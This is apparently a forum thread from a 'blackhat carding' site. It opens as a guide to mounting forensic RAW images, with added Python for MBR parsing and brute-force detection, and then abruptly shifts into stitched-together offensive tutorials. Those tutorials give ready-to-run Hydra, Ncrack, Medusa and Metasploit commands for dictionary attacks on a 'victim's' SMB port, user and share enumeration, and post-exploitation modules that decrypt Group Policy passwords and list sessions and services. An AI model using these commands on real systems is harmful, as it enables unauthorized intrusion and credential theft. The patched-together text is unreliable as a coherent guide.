[Guide] 3 Ways to Mount a RAW Image in Windows - Printable Version (Blackhat Carding Forum, https://bhcforums.cc; Forum: Community > General Discussion)
[Guide] 3 Ways to Mount a RAW Image in Windows - NINZA - 04-24-2020

In cyber forensics, to investigate a hard drive or disk we always make a forensic image first. In this article, we will learn various ways to mount forensic images.
A forensic image is a forensically sound and complete copy of a hard drive or other digital media, generally intended for use as evidence. Copies include unallocated space, slack space and the boot record. Many computer forensic programs, especially the all-in-one suites, use their own file formats to store information. These images are stored in the RAW, AFF or E01 format.
RAW Image Format: a RAW forensic image is a bit-by-bit copy of the original. It is often accompanied by metadata stored in separate files. This image format is the most commonly used and can be read by every forensic tool in the industry.
Why mounting an image is necessary

Once the RAW image is created, it can't be read unless it is mounted by a tool. Mounting is the process that takes the raw image and attaches it to a directory of your choice so that you can examine the contents of that image. The image has to contain a recognizable file system in a partition. This makes the invocation of the mount command interesting, because the raw image is a physical disk image and not a specific partition holding a file system.
Mounting an image for a read-only view lets you see the content of the image exactly as the user saw it on the original drive.
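Because a RAW image is a whole-disk image rather than a single partition, a mounting tool must first locate where each file system starts. As an added example (not part of the original post or of any of the tools below), this Python parser reads the MBR partition table of a RAW image, reports the byte offset at which each partition's file system begins, and hashes the image so you can confirm that read-only handling left the evidence unchanged; the image is constructed in memory and the 512-byte sector size is an assumption.

```python
import hashlib
import struct
from dataclasses import dataclass

SECTOR = 512  # assumed logical sector size of the RAW image

@dataclass
class Partition:
    index: int
    bootable: bool
    type_id: int
    start_lba: int
    sectors: int

    @property
    def byte_offset(self) -> int:  # where this partition's file system starts in the image
        return self.start_lba * SECTOR

def parse_mbr(image: bytes) -> list:
    """Return the non-empty entries of the classic MBR partition table (offset 446, 4 x 16 bytes)."""
    if len(image) < SECTOR or image[510:512] != b"\x55\xaa":
        raise ValueError("no 0x55AA boot signature at offset 510: not an MBR disk image")
    parts = []
    for i in range(4):
        entry = image[446 + 16 * i : 462 + 16 * i]
        status, _chs_start, ptype, _chs_end, lba, count = struct.unpack("<B3sB3sII", entry)
        if ptype != 0x00:  # type 0x00 marks an unused slot
            parts.append(Partition(i, status == 0x80, ptype, lba, count))
    return parts

def fs_oem_id(image: bytes, part: Partition) -> bytes:
    """Read the 8-byte OEM ID of a FAT/NTFS boot sector located at the partition start."""
    off = part.byte_offset
    return image[off + 3 : off + 11]

def image_sha256(image: bytes) -> str:
    """Hash of the whole image; compare before and after mounting to prove it was not altered."""
    return hashlib.sha256(image).hexdigest()

def build_sample_image() -> bytes:
    """Constructed 2 MiB RAW image with one bootable NTFS-typed (0x07) partition at LBA 2048."""
    img = bytearray(4096 * SECTOR)
    img[446:462] = struct.pack("<B3sB3sII", 0x80, b"\0" * 3, 0x07, b"\0" * 3, 2048, 2048)
    img[510:512] = b"\x55\xaa"
    off = 2048 * SECTOR
    img[off : off + 11] = b"\xeb\x52\x90NTFS    "  # jump instruction + OEM ID of an NTFS boot sector
    return bytes(img)

if __name__ == "__main__":
    img = build_sample_image()
    before = image_sha256(img)
    for p in parse_mbr(img):
        print(f"partition {p.index}: type 0x{p.type_id:02x}, mount at byte offset {p.byte_offset}, OEM ID {fs_oem_id(img, p)!r}")
    assert image_sha256(img) == before  # read-only handling left the evidence unchanged
```

The reported byte offset is the value a mounting tool needs to attach the file system inside the whole-disk image.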
There are various methods to mount a RAW file. But before we learn how to mount our RAW files, first have a look at My Computer so that you know how many drives you have before mounting a RAW file. For instance, the following is the My Computer view of my PC.

Now, let us have a look at these methods:
AccessData FTK Imager
FTK Imager (version – 3.4.2) is a tool introduced by AccessData which is used to preview data. It is also an imaging tool that lets us acquire data in a forensically sound way. FTK helps us create forensic images, mount an image for a read-only view, create hashes of files, etc., and right now we will focus on its Mount function. To mount a RAW image file via FTK, first download FTK Imager. Now that FTK is downloaded and installed, open it and click on File on the menu bar. A drop-down menu will appear; from this menu click on Image Mounting.
Once you click on the Mount button your image will be mounted and you can see the result under Mapped Images.

OSFMount
OSFMount (version – 1.5.1015) is software by PassMark Software. It lets you mount your image files, including hard disk image files, in Windows with a drive letter. You can then analyze the disk image files further. So that your original files are not altered, the image files are mounted as read-only by default. Download this software and open OSFMount once the installation is completed.
A dialogue will open; here give the path of your image file under the heading Image file and click on OK. You can see in the following image that your RAW image has been mounted as a result.

Mount Image Pro
GetData is a software development company that has launched Mount Image Pro (version – 6). It is a computer forensic tool which enables us to mount an image for forensic purposes. Download this software and open it after its installation.
A dialogue box will open; select your image file from it. Another dialogue box will then open showing all the details. Click on OK. It will further show the progress in another dialogue box. As the outcome, you can see that your image file is mounted as shown in the following image. Now, as I asked you to check My Computer before mounting the image, you can check My Computer again and you will see an extra drive as shown below.
In this article, we will learn how to gain control over our victim's PC through the SMB port. There are various ways to do it, so let us take the time to learn all of them, because different circumstances call for different measures.
xHydra

This is the graphical version of the dictionary attack via the SMB port. Open xHydra in your Kali, select the Single Target option and enter the IP of your victim PC there. Select smb in the box against the Protocol option and give the port number 445 against the Port option. Now go to the Passwords tab, select Username List and give the path of your text file containing the usernames in the box next to it. Then select Password List and give the path of your text file containing all the passwords in the box next to it. After doing this, go to the Start tab and click on the Start button on the left. The dictionary attack will now start, and you will obtain the username pc21 and password 123 of your victim.

Hydra

This is a one-command method and works efficiently with little work. It runs in the Kali terminal, so open the terminal in your Kali and type:

hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.118 smb

Here, -L denotes the path of the username list and -P the path of the password list. Once the command is executed it will start the dictionary attack and you will have the right username and password in no time. After a few minutes Hydra cracks the credentials; as you can observe, we successfully grabbed the SMB username pc21 and password 123.

Ncrack

This too is a one-command method that runs in the Kali terminal. Go to your terminal and type:

ncrack -U /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.118 -p 445

Here, -U denotes the path of the username list, -P the path of the password file and 445 is the port number. And so, with little work, we can obtain the password and username of our victim's PC.
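Each of the dictionary attacks above (xHydra, Hydra, Ncrack) produces a burst of failed network logons from a single source in a short time, which is exactly what a defender watches for. As an added example that is not part of the original post, the Python below runs a sliding-window detector over constructed Windows Security log lines (a simplified rendering of event 4625 failed logon and 4624 successful logon; the attacker address 192.0.2.10 and the field layout are assumptions), flagging a source after five LogonType 3 failures within a minute and escalating if that source then logs on successfully.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed, simplified Windows Security log lines (not a real event export).
# 4625 = failed logon, 4624 = successful logon; LogonType 3 (network) is what SMB uses.
SAMPLE_LOG = """\
2020-04-24T10:00:00 EventID=4625 LogonType=3 TargetUserName=admin IpAddress=192.0.2.10
2020-04-24T10:00:01 EventID=4625 LogonType=3 TargetUserName=admin IpAddress=192.0.2.10
2020-04-24T10:00:01 EventID=4625 LogonType=3 TargetUserName=raj IpAddress=192.0.2.10
2020-04-24T10:00:02 EventID=4625 LogonType=3 TargetUserName=pc21 IpAddress=192.0.2.10
2020-04-24T10:00:02 EventID=4625 LogonType=3 TargetUserName=pc21 IpAddress=192.0.2.10
2020-04-24T10:00:03 EventID=4624 LogonType=3 TargetUserName=pc21 IpAddress=192.0.2.10
2020-04-24T10:05:00 EventID=4625 LogonType=2 TargetUserName=alice IpAddress=127.0.0.1
2020-04-24T10:30:00 EventID=4625 LogonType=3 TargetUserName=bob IpAddress=192.0.2.20
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) EventID=(?P<id>\d+) LogonType=(?P<lt>\d+) "
    r"TargetUserName=(?P<user>\S+) IpAddress=(?P<ip>\S+)$"
)

def parse_events(log: str):
    """Yield (timestamp, event_id, logon_type, user, ip) for every well-formed line."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield datetime.fromisoformat(m["ts"]), int(m["id"]), int(m["lt"]), m["user"], m["ip"]

def detect_smb_guessing(log: str, threshold: int = 5, window_s: int = 60) -> list:
    """Flag a source IP once it causes `threshold` network-logon failures inside a sliding
    `window_s`-second window; escalate if that IP then logs on successfully."""
    failures = defaultdict(deque)  # ip -> timestamps of recent LogonType 3 failures
    flagged = set()
    alerts = []
    for ts, event_id, logon_type, user, ip in parse_events(log):
        if logon_type != 3:
            continue  # interactive/local logons are not SMB traffic
        if event_id == 4625:
            recent = failures[ip]
            recent.append(ts)
            while recent and (ts - recent[0]).total_seconds() > window_s:
                recent.popleft()  # drop failures that fell out of the window
            if len(recent) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append(("brute_force", ip, len(recent)))
        elif event_id == 4624 and ip in flagged:
            alerts.append(("success_after_brute_force", ip, user))
    return alerts

if __name__ == "__main__":
    for alert in detect_smb_guessing(SAMPLE_LOG):
        print(alert)
```

Tools that stop on the first hit (Hydra, or smb_login with stop_on_success) still leave the failed-logon trail that the first rule keys on, and the second rule catches the successful logon that follows it.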
Hence, these are all the methods to hack a system through the SMB port, which is used for file sharing.

Medusa

Medusa is a speedy, parallel, and modular login brute-forcer. The goal is to support as many services that allow remote authentication as possible. Run the following command:

medusa -h 192.168.1.118 -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M smbnt

Now the dictionary attack will start, and you will obtain the username and password of your victim.

Metasploit

This module will test an SMB login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database, this module will record successful logins and hosts so you can track your access. Once Metasploit opens, type:

use auxiliary/scanner/smb/smb_login
msf exploit (smb_login)>set rhosts 192.168.1.118
msf exploit (smb_login)>set user_file /root/Desktop/user.txt
msf exploit (smb_login)>set pass_file /root/Desktop/pass.txt
msf exploit (smb_login)>set stop_on_success true
msf exploit (smb_login)>exploit

Here, auxiliary/scanner/smb/smb_login is the module we use to attempt the login, /root/Desktop/user.txt is the path of a text file holding all the possible usernames, and /root/Desktop/pass.txt is the path of a text file holding all the possible passwords. Now the dictionary attack will start, and you will obtain the username and password of your victim.

In hacking, ports and protocols play a major role, as hacking is not possible without them. To work with them, let us first understand ports and protocols.
In information technology, a protocol is the special set of rules that endpoints in a telecommunication connection use when they communicate. Protocols specify the interactions between the communicating entities. So, basically, network protocols are the language of rules and conventions used for handling communication between network devices and ensuring the optimal operation of a network. Network protocols include key internet protocols such as IP and IPv6 as well as DNS and FTP, and also more network-specific protocols like SNMP and NTP.
In the internet protocol suite, a port is an endpoint of communication in an operating system. A port in computer networking is a logical access channel for communication between two devices. Bi-directional communications and more complex connections may use multiple ports (channels) simultaneously. It is always associated with an IP address of a host and the protocol type of the communication, and thus completes the destination or origination address of a communication session.
A port is identified for each address and protocol by a 16-bit number, commonly known as the port number.
That covers ports and protocols. Now, to work with the SMB protocol, let us understand it.
SMB: Server Message Block, the modern dialect of which was known as Common Internet File System, operates as an application-layer network protocol for file sharing that allows applications on a computer to read and write to files and to request services from server programs in a computer network. The SMB protocol can be used on top of its TCP/IP protocol or other network protocols. Using the SMB protocol, an application (or the user of an application) can access files or other resources at a remote server. This allows applications to read, create, and update files on the remote server. It can also communicate with any server program that is set up to receive an SMB client request.
Presently, the latest version of SMB is the SMB 3.1.1 which was introduced with Windows 10 and Windows Server 2016. This version supports AES 128 GCM encryption in addition to AES 128 CCM encryption added in SMB3 and implements pre-authentication integrity check using SHA-512 hash. SMB 3.1.1 also makes secure negotiation mandatory when connecting to clients using SMB 2.x and higher.
Working of SMB: SMB functions as a request-response or client-server protocol. The only time that the protocol does not work in a response-request framework is when a client requests an opportunistic lock (oplock) and the server has to break an existing oplock because the current mode is incompatible with the existing oplock. Client computers using SMB connect to a supporting server using NetBIOS over TCP/IP, IPX/SPX, or NetBEUI. Once the connection is established, the client computer or program can then open, read/write, and access files similar to the file system on a local computer.
SMB Protocol Security: The SMB protocol supports two levels of security. The first is the share level. The server is protected at this level and each share has a password. The client computer or user has to enter the password to access data or files saved under the specific share. This is the only security model available in the Core and Core Plus SMB protocol definitions. User-level protection was later added to the SMB protocol. It is applied to individual files, and each share is based on specific user access rights. Once a server authenticates the client, he/she is given a unique identification (UID) that is presented upon access to the server. The SMB protocol has supported individual security since LAN Manager 1.0 was implemented.
In Metasploit, there are very simple commands to find out whether the remote host or remote PC supports SMB or not.
SMB 2.0 Protocol Detection
Detect systems that support the SMB 2.0 protocol
use auxiliary/scanner/smb/smb2
msf exploit (smb2)>set rhosts 192.168.0.104
msf exploit (smb2)>set rport 445
msf exploit (smb2)>exploit
Once you hit enter after exploit, you will see the result providing you with all the information about the open SMB protocol.
SMB Version Detection
Display version information about each system
use auxiliary/scanner/smb/smb_version
msf exploit (smb_version)>set rhosts 192.168.0.104
msf exploit (smb_version)>exploit
After the command has run, it will inform you about the version of SMB running on the remote PC.
SMB Share Enumeration
This module determines what shares are provided by the SMB service and which ones are readable/writable. It also collects additional information such as share types, directories, files, timestamps, etc. By default, a netshareenum request is done in order to retrieve share information, but if this fails, you may also fall back to SRVSVC.
use auxiliary/scanner/smb/smb_enumshares
msf exploit (smb_enumshares)>set rhosts 192.168.0.104
msf exploit (smb_enumshares)>set smbuser raj
msf exploit (smb_enumshares)>set smbpass raj
msf exploit (smb_enumshares)>exploit
After the execution of the command, the result will be displayed. Access is denied on most of the systems that are probed; passing user credentials to the scanner will produce many different results.
SMB User Enumeration (SAM EnumUsers)
Determine what local users exist via the SAM RPC service
use auxiliary/scanner/smb/smb_enumusers
msf exploit (smb_enumusers)>set rhosts 192.168.0.104
msf exploit (smb_enumusers)>set smbuser raj
msf exploit (smb_enumusers)>set smbpass raj
msf exploit (smb_enumusers)>exploit
As the command executes, we can see that it has provided us with the list of users of the remote PC.
SMB SID User Enumeration (LookupSid)
Determine what users exist via brute-force SID lookups. This module can enumerate both local and domain accounts by setting ACTION to either LOCAL or DOMAIN.
use auxiliary/scanner/smb/smb_lookupsid
msf exploit (smb_lookupsid)>set rhosts 192.168.0.104
msf exploit (smb_lookupsid)>set smbuser raj
msf exploit (smb_lookupsid)>set smbpass raj
msf exploit (smb_lookupsid)>exploit
And so, you can find all the users which you never even knew existed.

Now, if you scan your remote PC's IP with nmap, you will see that these ports were open, and it is through them that you gathered all the desired information.
nmap -sV 192.168.0.104
In the result, as above, you can see that ports 445 and 139 are indeed open.

Conclusion: Understanding a port and finding such things through a given port helps us exploit our victim much more accurately, as we gather the most minute pieces of information. Collecting such information about a port and knowing what to do with it gives the exploiter a certain power of manipulation. Therefore, understanding a port, what it can do and how to find information about it on our remote PC helps us improve our hacking skills, as this is the foundation of hacking.
Enumerate all logged on users

This module will enumerate current and recently logged on Windows users.

msf > use post/windows/gather/enum_logged_on_users
msf post(enum_logged_on_users) > set session 1
msf post(enum_logged_on_users) > exploit

Gather All Group Policy Preferences
This module enumerates the victim machine's domain controller and connects to it via SMB. It then looks for Group Policy Preference XML files containing local user accounts and passwords and decrypts them using Microsoft's public AES key. Cached Group Policy files may remain if the group policy object is deleted rather than unlinked. Tested on a WinXP SP3 client and a Win2k8 R2 DC.
msf > use post/windows/gather/credentials/gpp
msf post(gpp) > set session 1
msf post(gpp) > exploit
Find All DNS Service Records

Enumerates known SRV records for a given domain using the target host's DNS query tool.
msf > use post/multi/gather/dns_srv_lookup
msf post(dns_srv_lookup) > set domain rajlab.com
msf post(dns_srv_lookup) > set session 1
msf post(dns_srv_lookup) > exploit
Find All Services in Server

This module will query the system for services and display the name and configuration info for each returned service. It allows you to optionally search the credentials, path, or start type for a string and only return the results that match. These query operations are cumulative, and if no query strings are specified, it just returns all services. NOTE: If the script hangs, Windows Firewall is most likely on and you did not migrate to a safe process (explorer.exe for example).
msf > use post/windows/gather/enum_services
msf post(enum_services) > set session 1
msf post(enum_services) > exploit
Find All Active Directory TCP sessions
This Module lists current TCP sessions.
msf > use post/windows/gather/tcpnetstat
msf post(tcpnetstat) > set session 1
msf post(tcpnetstat) > exploit
This module will enumerate all installed applications.

msf > use post/windows/gather/enum_applications
msf post(enum_applications) > set session 1
msf post(enum_applications) > exploit

Find All Remote Desktop Sessions
This module dumps MRU and connection data for RDP sessions.
msf > use post/windows/gather/enum_termserv
msf post(enum_termserv) > set session 1
msf post(enum_termserv) > exploit